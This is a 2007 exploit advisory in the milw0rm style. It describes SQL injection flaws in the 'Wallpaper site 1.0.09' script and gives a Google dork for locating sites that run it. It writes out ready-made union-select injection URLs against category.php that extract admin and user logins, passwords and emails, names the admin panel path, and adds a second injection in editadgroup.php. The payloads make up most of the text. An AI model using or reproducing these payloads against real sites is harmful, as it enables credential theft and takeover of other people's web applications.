# .__ __. # NN) NNNN JNNN` NNNN. NNN NNNNNNNNNNN NN) # NN) `NNN).NNNF .NNNNN (NN) """4NNN"""` NN) # NN) (NNNNNN` (NNNNN) NNN (NNN NN) # NN) 4NNNN` NNN(NNN.NNF NNN) NN) # NN) JNNNNL (NN) NNNNNN) (NNN NN) # NN) JNNNNNN) JNN` `NNNNN JNNF NN) # NN) .NNNF (NNN. NNN 4NNN) NNN) NN) # NN) JNNN` NNNN (NN) NNN` (NNN NN) # NN) NN) # .__ http://xaker.name __. # # # script name : Wallpaper site 1.0.09 # GoogLe Dork : Powered by EasySiteNetwork # Of. site : http://www.easysitenetwork.com/ # The price : ? # Risk : Average # Found By : Koller # Thanks : all members xaker.name & grabberz.com # Vulnerable files : category.php, editadgroup.php # Vuln : www.victim.com/category.php?catid=1+union+select+111,222,concat_ws(char(58),login,password),444+from+admin_login/* # www.victim.com/category.php?catid=1+union+select+111,222,concat_ws(char(58),login,password,email),444+from+users/* # # Admin panel: www.victim.com/siteadmin/index.php # # Addon :) - sql-injection in editadgroup.php - www.victim.com/siteadmin/editadgroup.php?groupid=2 union select 111,222/* # P.s. Happy New Year 8) # # Contact: K0ller (at) hotmail (dot) CoM # milw0rm.com [2007-12-22]